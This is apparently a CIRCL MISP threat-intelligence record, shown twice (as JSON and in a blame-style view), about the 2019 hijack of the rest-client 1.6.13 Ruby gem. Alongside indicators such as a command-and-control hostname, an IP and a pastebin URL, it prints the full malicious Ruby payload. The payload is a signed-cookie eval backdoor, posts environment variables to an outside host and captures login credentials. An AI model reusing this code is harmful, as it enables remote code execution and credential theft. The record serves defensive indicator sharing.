misp-circl-feed/feeds/circl/misp/5d5bfb96-ff34-4470-9107-cfdc950d210f.json

{
  "Event": {
    "analysis": "2",
    "date": "2019-08-20",
    "extends_uuid": "",
    "info": "OSINT - Ruby/Gem Warning! is rest-client 1.6.13 hijacked? #713",
    "publish_timestamp": "1566309812",
    "published": true,
    "threat_level_id": "3",
    "timestamp": "1566309784",
    "uuid": "5d5bfb96-ff34-4470-9107-cfdc950d210f",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#0071c3",
        "local": false,
        "name": "osint:lifetime=\"perpetual\"",
        "relationship_type": ""
      },
      {
        "colour": "#0087e8",
        "local": false,
        "name": "osint:certainty=\"50\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"External Remote Services - T1133\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Command and Control Channel - T1041\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Supply Chain Compromise - T1195\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Data Encrypted - T1022\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Automated Exfiltration - T1020\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Application Shimming - T1138\"",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "External analysis",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1566309283",
        "to_ids": false,
        "type": "link",
        "uuid": "5d5bfba3-5724-4fae-9ef5-42b5950d210f",
        "value": "https://github.com/rest-client/rest-client/issues/713"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1566309359",
        "to_ids": true,
        "type": "hostname",
        "uuid": "5d5bfbef-a630-45b0-999b-4fd0950d210f",
        "value": "mironanoru.zzz.com.ua"
      },
      {
        "category": "Network activity",
        "comment": "Attribute #7590600 enriched by dns.",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1566309381",
        "to_ids": false,
        "type": "ip-src",
        "uuid": "5d5bfc05-cbfc-4957-b0a2-4814e387cbd9",
        "value": "37.48.72.4"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1566309490",
        "to_ids": true,
        "type": "url",
        "uuid": "5d5bfc72-8704-4b7c-8eca-0598950d210f",
        "value": "https://pastebin.com/raw/5iNdELNX"
      },
      {
        "category": "External analysis",
        "comment": "In case people need to write a detailed security report at their company. This might help you.  Security threat consisted out of the following:",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1566309608",
        "to_ids": false,
        "type": "comment",
        "uuid": "5d5bfce8-409c-446e-a281-0598950d210f",
        "value": "It sent the URL of the infected host to the attacker.\r\n    It sent the environment variables of the infected host to the attacker. Depending on your set-up this can include credentials of services that you use e.g. database, payment service provider.\r\n    It allowed to eval Ruby code on the infected host. Attacker needed to send a signed (using the attacker\u00e2\u20ac\u2122s own key) cookie with the Ruby code to run.\r\n    It overloaded the #authenticate method on the Identity class. Every time the method gets called it will send the email/password to the attacker. However I'm unsure which libraries use the Identity class though, maybe someone else knows?"
      }
    ],
    "Object": [
      {
        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "4",
        "timestamp": "1566309529",
        "uuid": "5d5bfc59-5e18-4163-ba15-4987950d210f",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "5d5bfc59-5e18-4163-ba15-4987950d210f",
            "referenced_uuid": "5d5bfc72-8704-4b7c-8eca-0598950d210f",
            "relationship_type": "delivered-by",
            "timestamp": "1566309529",
            "uuid": "5d5bfc99-12e8-42f9-aba9-ced2950d210f"
          }
        ],
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1566309465",
            "to_ids": false,
            "type": "text",
            "uuid": "5d5bfc59-3740-4e10-bc6a-430f950d210f",
            "value": "_! {\r\n  unless ENV[\"URL_HOST\"].to_s.include?(\"localhost\")\r\n    unless defined?(ZZZ)\r\n      require \"openssl\"\r\n      require \"base64\"\r\n      public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64(\"LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2U3lDWUJiUUNsbTN4a21HMitRNwpSRjd5R1RXNzZoMVlrNE1qSHlNemhhdGUxQitDL1JQWjExbmU1WjBaMjhDK0VNWFVPWHRLTFlJMlF6Yk5VbmRLCmtVSUh3dWtZZ0hLWTRCL1U5OGI5UGJNZExOZjFtZ25UYnppVWhIYUFXQTB3R3RWL0ppQkNqc2taQkh4OTVlZGMKbmg0cCthcTM5ZlowemtFdUhYUUs0TU9URkJlaGJIelhCbmhPajhvU0NURHBjbjJEa1liR3lBcmpGb0JFTzQ4ZAphTklNSlAzQURpU1lYM2hmVmFoYTJCS0xzcnczWGFoMzFmOGh0U1dQNklBMTlqRy9wbVlqK2FBN0ZubWYwVHJDCjNnbGxRNFRrSWp6RVdHVUd5WklVcE9zZkVWeitWTDN0VDF1TDczdzVWa2NPU1MwajZ3cVQ5ckkrY2hHWXJJZEgKRFFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==\"))\r\n      Rack::Sendfile.prepend Module.new {\r\n        define_method(:call) { |e|\r\n          _! {\r\n            signature, payload, = e[\"HTTP_COOKIE\"].match(/__session=(.+);/)[1].split(\",\")\r\n            signature = Base64.urlsafe_decode64(signature)\r\n            payload = Base64.urlsafe_decode64(payload)\r\n            if public_key.verify(OpenSSL::Digest.new(\"sha256\"), signature, payload)\r\n              payload = JSON.parse(payload)\r\n              if (Time.now.to_i - payload[\"timestamp\"]) <= 60\r\n                eval(payload[\"ruby\"])\r\n              end\r\n            end\r\n          }\r\n          super(e)\r\n        }\r\n      }\r\n      ZZZ = 0\r\n    end\r\n  end\r\n}\r\n\r\n_! {\r\n  unless ENV[\"URL_HOST\"].to_s.include?(\"localhost\")\r\n    unless defined?(QQQ)\r\n      Faraday.post(\"http://mironanoru.zzz.com.ua/\", { \"x\" => ENV[\"URL_HOST\"].to_s, \"y\" => ENV.to_hash.to_yaml })\r\n      QQQ = 0\r\n    end\r\n  end\r\n}\r\n\r\n_! {\r\n  if ENV[\"URL_HOST\"].to_s[0] == \"e\" && ENV[\"URL_HOST\"].to_s[6] == \"x\" && ENV[\"URL_HOST\"].to_s.length == 13\r\n    unless defined?(GGG)\r\n      $kgiBWB3l = []\r\n      Module.new {\r\n        def authenticate(password)\r\n          $kgiBWB3l << \"#{email}:#{password}\" rescue nil\r\n          super\r\n        end\r\n      }.tap { |m| Identity.prepend(m) }\r\n      GGG = 0\r\n    end\r\n    loop {\r\n      break if $kgiBWB3l.empty?\r\n      y = $kgiBWB3l.pop\r\n      Faraday.post(\"http://mironanoru.zzz.com.ua/\", { \"x\" => ENV[\"URL_HOST\"].to_s, \"y\" => y })\r\n    }\r\n  end\r\n}"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1566309465",
            "to_ids": false,
            "type": "text",
            "uuid": "5d5bfc59-6870-4bca-9ec2-4704950d210f",
            "value": "Ruby"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1566309465",
            "to_ids": false,
            "type": "text",
            "uuid": "5d5bfc59-c158-435d-85b0-45e5950d210f",
            "value": "Malicious"
          }
        ]
      }
    ]
  }
}
chg: [feed] added 2023-04-21 13:25:09 +00:00			`{`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"Event": {`
			`"analysis": "2",`
			`"date": "2019-08-20",`
			`"extends_uuid": "",`
			`"info": "OSINT - Ruby/Gem Warning! is rest-client 1.6.13 hijacked? #713",`
			`"publish_timestamp": "1566309812",`
			`"published": true,`
			`"threat_level_id": "3",`
			`"timestamp": "1566309784",`
			`"uuid": "5d5bfb96-ff34-4470-9107-cfdc950d210f",`
			`"Orgc": {`
			`"name": "CIRCL",`
			`"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"`
			`},`
			`"Tag": [`
			`{`
			`"colour": "#004646",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "type:OSINT",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0071c3",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "osint:lifetime=\"perpetual\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0087e8",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "osint:certainty=\"50\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#ffffff",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "tlp:white",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-attack-pattern=\"External Remote Services - T1133\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Command and Control Channel - T1041\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-attack-pattern=\"Supply Chain Compromise - T1195\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-attack-pattern=\"Data Encrypted - T1022\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-attack-pattern=\"Automated Exfiltration - T1020\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-attack-pattern=\"Application Shimming - T1138\"",`
			`"relationship_type": ""`
			`}`
			`],`
			`"Attribute": [`
			`{`
			`"category": "External analysis",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1566309283",`
			`"to_ids": false,`
			`"type": "link",`
			`"uuid": "5d5bfba3-5724-4fae-9ef5-42b5950d210f",`
			`"value": "https://github.com/rest-client/rest-client/issues/713"`
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1566309359",`
			`"to_ids": true,`
			`"type": "hostname",`
			`"uuid": "5d5bfbef-a630-45b0-999b-4fd0950d210f",`
			`"value": "mironanoru.zzz.com.ua"`
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "Attribute #7590600 enriched by dns.",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1566309381",`
			`"to_ids": false,`
			`"type": "ip-src",`
			`"uuid": "5d5bfc05-cbfc-4957-b0a2-4814e387cbd9",`
			`"value": "37.48.72.4"`
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1566309490",`
			`"to_ids": true,`
			`"type": "url",`
			`"uuid": "5d5bfc72-8704-4b7c-8eca-0598950d210f",`
			`"value": "https://pastebin.com/raw/5iNdELNX"`
			`},`
			`{`
			`"category": "External analysis",`
			`"comment": "In case people need to write a detailed security report at their company. This might help you. Security threat consisted out of the following:",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1566309608",`
			`"to_ids": false,`
			`"type": "comment",`
			`"uuid": "5d5bfce8-409c-446e-a281-0598950d210f",`
			"value": "It sent the URL of the infected host to the attacker.\r\n It sent the environment variables of the infected host to the attacker. Depending on your set-up this can include credentials of services that you use e.g. database, payment service provider.\r\n It allowed to eval Ruby code on the infected host. Attacker needed to send a signed (using the attacker\u00e2\u20ac\u2122s own key) cookie with the Ruby code to run.\r\n It overloaded the #authenticate method on the Identity class. Every time the method gets called it will send the email/password to the attacker. However I'm unsure which libraries use the Identity class though, maybe someone else knows?"
			`}`
			`],`
			`"Object": [`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",`
			`"meta-category": "misc",`
			`"name": "script",`
			`"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",`
			`"template_version": "4",`
			`"timestamp": "1566309529",`
			`"uuid": "5d5bfc59-5e18-4163-ba15-4987950d210f",`
			`"ObjectReference": [`
			`{`
			`"comment": "",`
			`"object_uuid": "5d5bfc59-5e18-4163-ba15-4987950d210f",`
			`"referenced_uuid": "5d5bfc72-8704-4b7c-8eca-0598950d210f",`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`"relationship_type": "delivered-by",`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"timestamp": "1566309529",`
			`"uuid": "5d5bfc99-12e8-42f9-aba9-ced2950d210f"`
			`}`
			`],`
			`"Attribute": [`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "script",`
			`"timestamp": "1566309465",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5d5bfc59-3740-4e10-bc6a-430f950d210f",`
			"value": "_! {\r\n unless ENV[\"URL_HOST\"].to_s.include?(\"localhost\")\r\n unless defined?(ZZZ)\r\n require \"openssl\"\r\n require \"base64\"\r\n public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64(\"LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2U3lDWUJiUUNsbTN4a21HMitRNwpSRjd5R1RXNzZoMVlrNE1qSHlNemhhdGUxQitDL1JQWjExbmU1WjBaMjhDK0VNWFVPWHRLTFlJMlF6Yk5VbmRLCmtVSUh3dWtZZ0hLWTRCL1U5OGI5UGJNZExOZjFtZ25UYnppVWhIYUFXQTB3R3RWL0ppQkNqc2taQkh4OTVlZGMKbmg0cCthcTM5ZlowemtFdUhYUUs0TU9URkJlaGJIelhCbmhPajhvU0NURHBjbjJEa1liR3lBcmpGb0JFTzQ4ZAphTklNSlAzQURpU1lYM2hmVmFoYTJCS0xzcnczWGFoMzFmOGh0U1dQNklBMTlqRy9wbVlqK2FBN0ZubWYwVHJDCjNnbGxRNFRrSWp6RVdHVUd5WklVcE9zZkVWeitWTDN0VDF1TDczdzVWa2NPU1MwajZ3cVQ5ckkrY2hHWXJJZEgKRFFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==\"))\r\n Rack::Sendfile.prepend Module.new {\r\n define_method(:call) { \|e\|\r\n _! {\r\n signature, payload, = e[\"HTTP_COOKIE\"].match(/__session=(.+);/)[1].split(\",\")\r\n signature = Base64.urlsafe_decode64(signature)\r\n payload = Base64.urlsafe_decode64(payload)\r\n if public_key.verify(OpenSSL::Digest.new(\"sha256\"), signature, payload)\r\n payload = JSON.parse(payload)\r\n if (Time.now.to_i - payload[\"timestamp\"]) <= 60\r\n eval(payload[\"ruby\"])\r\n end\r\n end\r\n }\r\n super(e)\r\n }\r\n }\r\n ZZZ = 0\r\n end\r\n end\r\n}\r\n\r\n_! {\r\n unless ENV[\"URL_HOST\"].to_s.include?(\"localhost\")\r\n unless defined?(QQQ)\r\n Faraday.post(\"http://mironanoru.zzz.com.ua/\", { \"x\" => ENV[\"URL_HOST\"].to_s, \"y\" => ENV.to_hash.to_yaml })\r\n QQQ = 0\r\n end\r\n end\r\n}\r\n\r\n_! {\r\n if ENV[\"URL_HOST\"].to_s[0] == \"e\" && ENV[\"URL_HOST\"].to_s[6] == \"x\" && ENV[\"URL_HOST\"].to_s.length == 13\r\n unless defined?(GGG)\r\n $kgiBWB3l = []\r\n Module.new {\r\n def authenticate(password)\r\n $kgiBWB3l << \"#{email}:#{password}\" rescue nil\r\n super\r\n end\r\n }.tap { \|m\| Identity.prepend(m) }\r\n GGG = 0\r\n end\r\n loop {\r\n break if $kgiBWB3l.empty?\r\n y = $kgiBWB3l.pop\r\n Faraday.post(\"http://mironanoru.zzz.com.ua/\", { \"x\" => ENV[\"URL_HOST\"].to_s, \"y\" => y })\r\n }\r\n end\r\n}"
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "language",`
			`"timestamp": "1566309465",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5d5bfc59-6870-4bca-9ec2-4704950d210f",`
			`"value": "Ruby"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "state",`
			`"timestamp": "1566309465",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5d5bfc59-c158-435d-85b0-45e5950d210f",`
			`"value": "Malicious"`
			`}`
			`]`
			`}`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`]`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`}`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`}`